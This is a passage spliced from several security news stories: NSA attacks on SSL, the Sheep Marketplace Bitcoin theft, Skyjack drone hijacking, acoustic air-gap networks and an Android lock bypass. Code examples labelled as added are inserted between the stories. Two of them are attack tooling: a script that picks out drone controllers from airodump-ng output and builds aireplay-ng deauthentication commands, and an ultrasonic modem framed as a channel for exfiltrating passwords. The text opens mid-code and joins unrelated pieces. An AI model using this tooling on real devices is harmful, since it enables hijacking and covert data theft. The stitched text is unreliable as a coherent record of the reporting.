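    except ssl.SSLError:
        return None
    return ctx


if __name__ == "__main__":
    good = hardened_context()
    print("hardened, non-PFS suites:", audit(good))
    weak = static_rsa_context()
    print("static RSA suites offered by the weak config:",
          audit(weak) if weak else "none available in this build")
```

The order of the cipher string also matters in practice: a server that lists static RSA suites anywhere will still negotiate them with clients that prefer them, which is why the example removes them with `!kRSA` rather than merely ranking them last.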
Green’s essay, meanwhile, postulates several ways the NSA may actually be getting through SSL encryption today. Some of them don’t involve hacking at all: the NSA could simply be obtaining SSL private keys from organizations, through court orders or even coercion. Exploiting vulnerabilities in the SSL software itself is also a possibility, he said.
“The beauty is that these attacks don’t even require remote code execution. Given the right vulnerability, it may simply require a handful of malformed SSL requests to map the full contents of the OpenSSL/SChannel heap,” Green wrote.
The NSA, Green wrote, could also manage to sidestep SSL by working out a backroom deal with hardware encryption chip makers. A September expose by the New York Times on the Bullrun program said the NSA and Britain’s GCHQ have been in cahoots with chip makers to enable decryption on several leading VPN encryption chips.
“The NSA documents aren’t clear on how this capability works, or if it even involves SSL. If it does, the obvious guess is that each chip encrypts and exfiltrates bits of the session key via ‘random’ fields such as IVs and handshake nonces. Indeed, this is relatively easy to implement on an opaque hardware device,” Green wrote. “The interesting question is how one ensures these backdoors can only be exploited by NSA — and not by rival intelligence agencies.”
Side-channel attacks are another option, though, as Green said, an attacker would need physical proximity to a TLS server to siphon off whatever might be leaking; with cloud computing, where an attacker’s virtual machine can share hardware with the target’s, this option is more viable than in the past.
Random number generators are another likely NSA target; RNGs are considered fragile and any number of factors could weaken them, Green said in his essay. Or the NSA could insert itself into the development process for one of these RNGs as it allegedly did with NIST in the development of the Dual-EC DRBG generator that is default in the widely used RSA BSAFE libraries.
And what about actually cracking RSA keys? Green says that while it is difficult, and rumors that the NSA has made some sort of cryptographic breakthrough are constant, it’s not entirely out of reach. A decade ago, the cost was estimated at $10 million for a machine that could factor one 1024-bit RSA key per year; Green said Moore’s Law has since brought that cost below $1 million. A botnet-style distributed network could also do the trick.
“In principle, a cluster about the size of the real-life Conficker botnet could do serious violence to 1024-bit keys,” Green said, referring to research already conducted on this possibility.
“We don’t know and can’t know the answer to these things, and honestly it’ll make you crazy if you start thinking about it,” Green wrote. “All we can really do is take NSA/GCHQ at their word when they tell us that these capabilities are ‘extremely fragile’. That should at least give us hope.”
UPDATE: As if Bitcoin malware and Bitcoin mining malware weren’t enough to worry about, there was more trouble for the users of the digital crypto-currency last week as 96,000 Bitcoins disappeared from the Sheep Marketplace.
Bitcoin’s value has surged in recent weeks, peaking at an astonishing $1,203 per coin last week before dropping back nearly $200 over the weekend. The exchange rate is climbing again and currently rests at $1,102 per coin, putting the value of the heist at $105,792,000.
To put that in historical perspective, as far as popular heists go, the New York Times estimated in 2008 that cross-dressing thieves made off with roughly $105 million in the famous robbery of the Harry Winston jewelry store in Paris. According to a Wired article from 2009, Leonardo Notarbartolo made off with $100 million worth of loose diamonds, jewelry and gold after robbing the Antwerp Diamond Center in Antwerp, Belgium, in the early 2000s.
Unsourced reports claim that the attackers spoofed the site’s user interface so that members’ accounts appeared to hold their correct balances. Whether that is true is not yet clear, but user-interface spoofing is a common tactic in online bank account theft.
According to Tom Gorup, a security operation center (SOC) analyst at Rook Consulting, there are a number of factors that may have helped the attackers cover their tracks during and immediately following the attack.
For one, based on a description of the attack on the forum Bitcointalk.org, Gorup said it’s likely that the attackers hijacked the Sheep Marketplace’s domain name system (DNS) servers and routed incoming traffic through a set of servers under their control, which would let them display whatever content they liked to anyone trying to access an account. Gorup also said it’s probable that the thieves operate a botnet, because the service was under a distributed denial of service attack while the robbery was in progress. The DDoS would have knocked the Sheep Marketplace offline, making it impossible for users to access and monitor their accounts.
Gorup told Threatpost that the most challenging aspect of the attack would have been finding an exploitable vulnerability in the vendor’s software. Once the attacker gained proper privileges via exploit, the process of actually stealing the Bitcoins, he said, is trivial.
Once an attacker has the money in hand, so to speak, another challenge presents itself: how do you spend it without your victims noticing? It might seem simple, given that Bitcoin is pseudonymous, but, like any functional currency, Bitcoin cannot be truly anonymous because there must be safeguards against double-spending.
This is where Bitcoin’s public ledger, the blockchain, comes into play. Every transaction is recorded there, so the instant someone tries to move a massive sum, like 96,000 Bitcoins, from one wallet to another, the blockchain records that movement for anyone to see. Moreover, every coin’s history is traceable through the chain of transactions that produced it, giving investigators another avenue for tracking the stolen funds.
It’s well known that Bitcoins are used to launder traditional currencies, but there are, of course, services for “cleaning” stolen Bitcoins as well. These services are called tumblers. Like any money laundering service, a tumbler takes in stolen Bitcoins or fractions of Bitcoins and pays out different fractions of different Bitcoins. Gorup notes that one downside of tumbler services, from a criminal’s standpoint, is that many of them hand back coins that are themselves stolen.
Both Gorup and a Reddit thread dedicated to tracking the thief or thieves indicate that it is still possible, albeit difficult, to use the blockchain to follow money going through tumblers.
Gorup noted that the vast scope of this theft is going to make it considerably more difficult for the attackers to tumble their newly acquired Bitcoins. However, he believes their botnet – if they do indeed have one – could make the process slightly easier.
“It can be safe to say that the attacker could have created a number of wallets distributed throughout his/her botnet in preparation for this attack and automated the exchange to distribute throughout these wallets,” Gorup told Threatpost. “Then potentially, if they felt it wasn’t clean enough already, utilize multiple tumbler services to further clean these coins. It would be complicated, but with proper preparation, like any decent attacker should do, this is probably close to how it was done.”
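Tracking coins through a tumbler works because taint survives mixing in diluted form: an output that spends stolen and clean inputs together is partly stolen in proportion to the value. The following is an added example, not code from Gorup, Rook Consulting, the Reddit thread or Threatpost. It runs proportional ("haircut") taint propagation over a constructed transaction graph in which one transaction mimics a tumbler pooling stolen coins with clean ones; the transaction ids, addresses and amounts are made up, and no real Sheep Marketplace data is used.

```python
"""Follow stolen coins through a constructed transaction graph.

Added example, not code from Gorup, Rook Consulting, the Reddit thread or
Threatpost. Transaction ids, addresses and amounts are constructed to show the
method (proportional, or "haircut", taint propagation across outputs).
"""

# Constructed chain, in confirmation order. Each transaction spends earlier
# outputs, referenced as (txid, output_index), and creates (address, amount)
# outputs. "theft" drains the market; "mix1" mimics a tumbler pooling stolen
# and clean coins; "spend" cashes out a blend of both.
TXS = [
    {"id": "theft", "inputs": [], "outputs": [("thief_a", 60000), ("thief_b", 36000)]},
    {"id": "clean", "inputs": [], "outputs": [("honest", 40000)]},
    {"id": "mix1", "inputs": [("theft", 0), ("clean", 0)],
     "outputs": [("out1", 50000), ("out2", 50000)]},
    {"id": "spend", "inputs": [("mix1", 1), ("theft", 1)],
     "outputs": [("cashout", 86000)]},
]


def taint_trace(txs, seed_outputs):
    """Propagate taint from seed (txid, index) outputs through all later spends.

    Every output of a transaction inherits the value-weighted average taint of
    the inputs it spends, so mixing with clean coins dilutes the marking but
    never removes it. Returns {(txid, index): (address, amount, taint_fraction)}.
    Assumes txs are in confirmation order (inputs refer to earlier entries).
    """
    by_id = {tx["id"]: tx for tx in txs}
    fraction = {}
    result = {}
    for tx in txs:
        in_value = in_tainted = 0.0
        for ptx, pidx in tx["inputs"]:
            _, amount = by_id[ptx]["outputs"][pidx]
            in_value += amount
            in_tainted += amount * fraction.get((ptx, pidx), 0.0)
        inherited = in_tainted / in_value if in_value else 0.0
        for idx, (addr, amount) in enumerate(tx["outputs"]):
            key = (tx["id"], idx)
            frac = 1.0 if key in seed_outputs else inherited
            fraction[key] = frac
            result[key] = (addr, amount, frac)
    return result


def flagged_addresses(trace, threshold=0.5):
    """Addresses holding outputs whose taint meets the threshold: candidates to watch at exchanges."""
    return sorted({addr for addr, _, frac in trace.values() if frac >= threshold})


def stolen_value_at(trace, address):
    """Estimated stolen coins sitting at an address (amount weighted by taint)."""
    return sum(amount * frac for addr, amount, frac in trace.values() if addr == address)


if __name__ == "__main__":
    trace = taint_trace(TXS, {("theft", 0), ("theft", 1)})
    for key, (addr, amount, frac) in trace.items():
        print(f"{key[0]}:{key[1]} {addr:8} {amount:>6} taint={frac:.3f}")
    print("watch list:", flagged_addresses(trace))
```

The haircut rule is one of several accounting conventions (FIFO and "poison" are others); whichever is used, a tumbler that pays out other people's stolen coins, as Gorup notes above, only raises the taint of what the thief receives.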
Initially, a New Statesman report indicates that the Sheep Marketplace’s administrators believed that an error by a third party vendor had caused a much smaller sum of money to go missing. It quickly became apparent that the amount lost was far greater.
Gorup claims that the drop in Bitcoin value over the weekend is not related to the theft:
“I think the drop wasn’t due to theft as the Sheep Marketplace theft took place five days prior to Bitcoins reaching an all-time high. I think it was a natural drop after a huge peak, just as this happens time to time in the stock exchange when everyone wants to capitalize on their investment. I wouldn’t be surprised to see one or two more surges like this before Bitcoin settles to a normal rate like any other traded material like gold or silver.”
Straight-up Bitcoin theft along with infections from Bitcoin mining malware and Bitcoin stealing malware are becoming daily occurrences. Recently published research suggested there are frailties within the underpinnings of the Bitcoin economy itself. Trouble isn’t likely to abate any time soon for digital crypto-currency, given that it is completely unregulated. That reality presents a number of very real problems, not the least of which is, how do you recover stolen coins? Users certainly won’t be repaid in civil or criminal suits. Not yet at least.
*A previous version of this story referred to the Sheep Marketplace as a Bitcoin exchange. A Bitcoin exchange is a place where Bitcoin holders can exchange their Bitcoins for traditional currency. Sheep Marketplace is an underground marketplace located within the Tor Hidden Services that caters to the sale of drugs, weapons, and other illicit goods.
UPDATE–The skies may soon be full of drones: some run by law enforcement agencies, others run by intelligence agencies and still others delivering novels and cases of diapers from Amazon. But a new project by well-known hacker Samy Kamkar may give control of some of those drones to anyone with $400 and an hour of free time.
Small drones can be quite inexpensive and easy to use. Some models can be controlled from an iPhone, tablet or Android device and can be modified fairly easily, as well. Kamkar, a veteran security researcher and hacker, has taken advantage of these properties and put together his own drone platform, called Skyjack. The drone has the ability to forcibly disconnect another drone from its controller and then force the target to accept commands from the Skyjack drone. All of this is done wirelessly and doesn’t require the use of any exploit or security vulnerability.
The drone platform that Kamkar built uses readily available components such as a Raspberry Pi and open-source software he developed. He said that, using the detailed instructions he’s published, anyone with a familiarity with Linux could build a Skyjack drone of his own in under an hour. With that and a controller, the builder is then ready to hijack his neighbor’s drone. The Parrot drones are available for less than $300 and the other components are relatively inexpensive, as well.
“My instructions are pretty detailed, I’ve made the code entirely free and open source, and fortunately all the technology is so low-cost and easy to acquire (< $400 for all of it, including your very own drone) that to put it all together from my instructions would take someone under an hour if they were familiar with Linux,” Kamkar said via email.
“I may also release an ISO that users can simply drop onto a Raspberry Pi without performing any configuration at all, and in that case it would potentially just take minutes without any setup required besides plugging components in!”
The method that Kamkar’s code uses to take over a target drone is deceptively simple. The Skyjack drone detects the wireless signal sent out by a target drone, injects WiFi packets into the target’s connection, de-authenticates it from its real controller and then authenticates it to the Skyjack drone. Kamkar then has the ability to send any commands he wants to the hijacked drone. This can all be done from the ground, as well, he said, using a normal Linux box and his code.
Kamkar uses tools from the Aircrack-ng wireless auditing suite to find target drones; the Skyjack software then deauthenticates their clients and connects to the drones itself. He identifies the drones by looking for MAC addresses whose vendor prefix belongs to Parrot, the company that makes the small drones he used for the project. The range of a Skyjack drone is limited by that of its WiFi card, but Kamkar said he uses a very powerful adapter, the Alfa AWUS036H, which transmits at 1000mW.
“The only security on the Parrot drones is that when the owner is connected to it, no one else is able to control it. This is why I need to use a wifi chipset that allows me to inject packets as I need to exploit wifi and deauthenticate the true owner who is controlling it,” Kamkar said.
“Once deauth’d, I can then take over control without ever actually exploiting the Parrot itself since it creates its own open, wireless network.”
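The target-selection step Kamkar describes is a parsing job: read the scan output, keep the access points whose MAC vendor prefix matches, and pair them with the stations attached to them. The following is an added example, not Kamkar's Skyjack code. It parses the CSV that airodump-ng writes (the `-w prefix` option produces `prefix-01.csv`), selects APs whose BSSID falls in a vendor OUI list, lists their clients and builds, without running, the aireplay-ng deauthentication command such a tool would issue. The scan data is constructed, and the OUI list is an assumption taken from public vendor registrations; check it against the IEEE OUI registry before relying on it.

```python
"""Pick drone access points and their controllers out of airodump-ng output.

Added example, not Kamkar's Skyjack code. Parses airodump-ng's CSV, matches
AP BSSIDs against a vendor OUI list and pairs them with attached stations.
Nothing is transmitted; the aireplay-ng command is only constructed.
"""
import csv
import io

# Assumed vendor prefixes (first three octets). Verify against the IEEE OUI
# registry; treat these as illustrative placeholders.
ASSUMED_VENDOR_OUIS = {"90:03:B7", "A0:14:3D"}

# Constructed airodump-ng-style capture, not a real scan. Layout follows the
# two sections airodump-ng writes: access points, blank line, stations.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
90:03:B7:12:34:56, 2013-12-03 10:00:01, 2013-12-03 10:05:00,  6,  54, OPN ,     ,    , -42,  300,    0,   0.  0.  0.  0,  14, ardrone2_000001, 
00:11:22:33:44:55, 2013-12-03 10:00:01, 2013-12-03 10:05:00,  1,  54, WPA2, CCMP, PSK, -70,  290,    0,   0.  0.  0.  0,   9, HomeWiFi1, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
F0:D1:A9:00:00:01, 2013-12-03 10:00:05, 2013-12-03 10:05:00, -45,  800, 90:03:B7:12:34:56, 
DC:2B:61:00:00:02, 2013-12-03 10:00:05, 2013-12-03 10:05:00, -71,   50, 00:11:22:33:44:55, HomeWiFi1
"""


def oui(mac: str) -> str:
    """Vendor prefix of a MAC address, normalised to upper case."""
    return mac.strip().upper()[:8]


def parse_airodump(text: str):
    """Return (aps, stations): aps maps BSSID -> ESSID; stations is [(station_mac, bssid)]."""
    aps, stations = {}, []
    section = None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue
        if row[0].startswith("BSSID"):
            section = "ap"
            continue
        if row[0].startswith("Station MAC"):
            section = "sta"
            continue
        if section == "ap" and len(row) >= 14:
            aps[row[0].strip()] = row[13].strip()          # column 13 is ESSID
        elif section == "sta" and len(row) >= 6:
            bssid = row[5].strip()                         # column 5 is the AP the client is on
            if bssid != "(not associated)":
                stations.append((row[0].strip(), bssid))
    return aps, stations


def find_drone_clients(text: str, vendor_ouis=ASSUMED_VENDOR_OUIS):
    """Stations attached to APs whose BSSID carries a listed vendor prefix."""
    aps, stations = parse_airodump(text)
    drones = {bssid for bssid in aps if oui(bssid) in vendor_ouis}
    return [(sta, bssid, aps[bssid]) for sta, bssid in stations if bssid in drones]


def deauth_commands(clients, iface="mon0", count=5):
    """Build (do not run) the aireplay-ng deauth invocation: -0 count, -a AP, -c client."""
    return [f"aireplay-ng -0 {count} -a {bssid} -c {sta} {iface}"
            for sta, bssid, _ in clients]


if __name__ == "__main__":
    found = find_drone_clients(SAMPLE_CSV)
    for sta, bssid, essid in found:
        print(f"{essid}: controller {sta} on {bssid}")
    print("\n".join(deauth_commands(found)))
```

The reason no exploit is needed is visible in the sample: the drone's network is `OPN`, and 802.11 deauthentication frames are unauthenticated unless management frame protection (802.11w) is in use, so any card that can inject frames can evict the real controller.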
Amazon’s Jeff Bezos said the company’s Prime Air drone delivery program is several years away yet, and it’s unclear which drone platform it will use if it’s ever deployed. Kamkar’s Skyjack code is available free on Github.
This story was updated on Dec. 4 to clarify that not all drones use WiFi and that Skyjack isn’t meant to work against all drone platforms.
Image from Flickr photos of Unten44.
The soundest security advice managers of critical computing systems have been given is to air gap those machines: don’t network them and don’t expose them to the Internet, and there is no way for hackers to reach them from the Web and no way for a direct infection to replicate.
Recently, there’s been reason for pause in that thinking, starting with the speculation and skepticism over badBIOS, malware that allegedly can not only cross platforms, but can infect air-gapped machines using sound waves.
Now comes another attack using high-frequency sound waves to bridge the gap between machines, bypassing the old-fashioned delivery routes of phishing emails and infected USB drives. Researchers at the Fraunhofer Institute for Communication, Information Processing and Ergonomics in Germany published a paper last week in the San Jose-based Journal of Communications describing how a communication system designed for underwater use can carry short pieces of data, such as passwords, across a chain of air-gapped computers. The computers form a mesh network in which each node can send or receive data (here, as an audio emanation) and acts as a router, forwarding the data to the next hop in the chain until it reaches the attacker.
Michael Hanspach, one of the researchers, along with colleague Michael Goetz, told Threatpost that there is no connection between their paper “On Covert Acoustical Mesh Networks in Air” and badBIOS. Hanspach said their attack is practical today because the utilized techniques are well documented.
“If we were able to come up with this research with very few people, time and budget (and with good intentions), so would be larger groups (maybe with a different intention),” Hanspach said via email. “Therefore, anyone working in a security critical context should be thinking about protection measures.”
The two scientists built on a communication system based on the Generic Underwater Application Language (GUWAL), designed for low-bandwidth networks, to exchange data between unconnected systems using only the microphones and speakers built into today’s computers. Their test machines were Lenovo T400 laptops running the Debian operating system. Microphones and speakers are not generally considered when network and security policies are developed, the scientists said, which makes them the perfect pawns for this kind of covert communication.
“The concept of a covert acoustical mesh network renders many conventional security concepts useless, as acoustical communications are usually not considered,” the scientists wrote in their paper.
Using ultrasonic frequencies inaudible to humans, the scientists transmitted data almost 65 feet between laptops, at a slow 20 bits per second with a latency of about six seconds per hop. Additional hops overcome the distance limit, but the low bandwidth restricts how much data can be sent in this scenario.
“Of course, you could only transfer small-sized information over this network,” Hanspach told Threatpost. “But, the limit of 20 bit/s is just what we could reasonably achieve in the presented setup and is not necessarily a general limit.”
The paper presents several scenarios in which such an attack would work. In one, starting from a computer compromised with a keylogger called logkeys, keystrokes are written to a named pipe that the acoustic transmitter reads, and the transmitter sends the data through the covert network until it reaches the attacker. Hanspach said the keylogger has been successfully tested in this setup.
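The transmitter in that pipeline is, at bottom, an acoustic modem. The following is an added example, not the Fraunhofer researchers' GUWAL-based implementation: a binary frequency-shift-keying modem in pure Python that encodes bytes as two tones above the range of hearing, recovers them with a Goertzel detector per symbol, and survives simulated room noise. The tone frequencies (18 and 19.5 kHz), the 48 kHz sample rate and the noise model are my choices; the symbol length is set to match the paper's reported 20 bit/s.

```python
"""Ultrasonic binary FSK modem: the building block of an acoustic covert channel.

Added example, not the Fraunhofer researchers' GUWAL-based implementation.
Tone frequencies, sample rate and noise model are assumptions made here;
the symbol rate matches the paper's reported 20 bit/s.
"""
import math
import random

SAMPLE_RATE = 48000                         # Hz, a typical laptop sound card rate
BIT_RATE = 20                               # symbols per second, as in the paper
SYMBOL_SAMPLES = SAMPLE_RATE // BIT_RATE    # 2400 samples per bit
FREQ_0, FREQ_1 = 18000.0, 19500.0           # both fall on integer bins for N = 2400


def bytes_to_bits(data: bytes):
    """MSB-first bit list."""
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]


def bits_to_bytes(bits):
    """Inverse of bytes_to_bits; trailing partial bytes are dropped."""
    usable = len(bits) - len(bits) % 8
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


def modulate(data: bytes):
    """Turn bytes into float samples in [-1, 1]: one pure tone per bit."""
    samples = []
    for bit in bytes_to_bits(data):
        f = FREQ_1 if bit else FREQ_0
        samples.extend(math.sin(2 * math.pi * f * n / SAMPLE_RATE) for n in range(SYMBOL_SAMPLES))
    return samples


def goertzel_power(samples, freq):
    """Energy in one frequency bin of a block (Goertzel algorithm, no FFT needed)."""
    n = len(samples)
    k = round(n * freq / SAMPLE_RATE)
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev2 ** 2 + s_prev ** 2 - coeff * s_prev * s_prev2


def demodulate(samples) -> bytes:
    """Decide each symbol by comparing the energy at the two tone frequencies."""
    bits = []
    for start in range(0, len(samples) - SYMBOL_SAMPLES + 1, SYMBOL_SAMPLES):
        block = samples[start:start + SYMBOL_SAMPLES]
        bits.append(1 if goertzel_power(block, FREQ_1) > goertzel_power(block, FREQ_0) else 0)
    return bits_to_bytes(bits)


def add_noise(samples, sigma=0.5, seed=1):
    """Simulated room noise (Gaussian, fixed seed) to show the detector's margin."""
    rng = random.Random(seed)
    return [x + rng.gauss(0.0, sigma) for x in samples]


def seconds_to_exfiltrate(nbytes: int) -> float:
    """Air time needed for a payload at the paper's bit rate, per hop."""
    return nbytes * 8 / BIT_RATE


if __name__ == "__main__":
    secret = b"pw:hunter2"
    wire = add_noise(modulate(secret))
    print(demodulate(wire), f"sent in {seconds_to_exfiltrate(len(secret))} s")
```

At this rate a 256-bit key crosses one hop in about 13 seconds, which is why the paper's scenarios are limited to keystrokes, passwords and keys rather than files; a real deployment would also need framing and error correction, which this example omits.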
Hanspach and Goetz also said that this type of covert network could be used to break two-factor authentication by listening for and transmitting the authentication feedback of a hardware dongle or smartcard. They also speculate it could be used to send data such as private encryption keys or text files of stolen data.
As for countermeasures, it may not always be possible to turn off audio devices because they would be needed for VoIP or video conferencing, so the scientists recommend the use of audio-filtering guards or a host-based audio intrusion detection guard, both of which analyze audio input and output looking for anomalous signals or hidden messages.
While the possibilities presented in this paper and by badBIOS might seem outlandish, they are new areas of research that defenders have not considered in policies or preventative technology.
“We have shown that the establishment of covert acoustical mesh networks in air is feasible in setups with commonly available business laptops,” the paper said. “Acoustical networking as a covert communication technology is a considerable threat to computer security and might even break the security goals of high assurance computing systems based on formally verified micro kernels that did not consider acoustical networking in their security concept.”
The researchers who discovered a serious vulnerability in Android 4.3 Jelly Bean that enables a malicious app to disable the security locks on a vulnerable device have published a proof-of-concept app that exploits the bug, as well as source code for the app.
The vulnerability in question lies in the way that Jelly Bean handles the flow of requests when a user attempts to change one of the many security locks in the operating system. If a user goes in to change, for example, the gesture lock, Android will ask the user to confirm her PIN code or another security mechanism. The vulnerability enables a malicious app to disable this check and all of the security locks in the OS. Researchers at Curesec in Germany discovered the bug in October and reported it to Google, which included a fix in Android 4.4 Kit Kat.
However, Android 4.3 Jelly Bean is by far the most widely deployed version of the mobile OS and it has become obvious in the last couple of years that few carriers bother to push security updates to their users, preferring to have them buy new handsets with newer software instead. This means that there are millions of Android devices potentially vulnerable to this attack. The researchers at Curesec on Tuesday published an app that demonstrates the attack and also released the source code for the app, giving other researchers the ability to reproduce the exploit.
Marco Lux, a researcher at Curesec, said that he doesn’t know of any workarounds for the vulnerability, and there’s no patch available for Jelly Bean at this point.
“I am not aware of any workaround. By my current knowledge it can be only done by a malicious app,” Lux said via email.
Unlike Apple, which pushes updates directly to users via the software update mechanism in iOS, Android updates are the responsibility of the various carriers who sell Android devices. The ACLU has asked the Federal Trade Commission to investigate the carriers’ failure to send security updates to users and security and privacy researchers have been critical of the carriers for this oversight, as well.
In order to exploit the vulnerability discovered by Curesec, an attacker would need to entice a target user to download a malicious app to her device, something that has proven to be rather easy to do in recent years. Malicious apps, as well as legitimate ones laden with hidden malware, have shown up regularly in Google Play and third-party app stores.
Image from Flickr photos of Milind Alvares.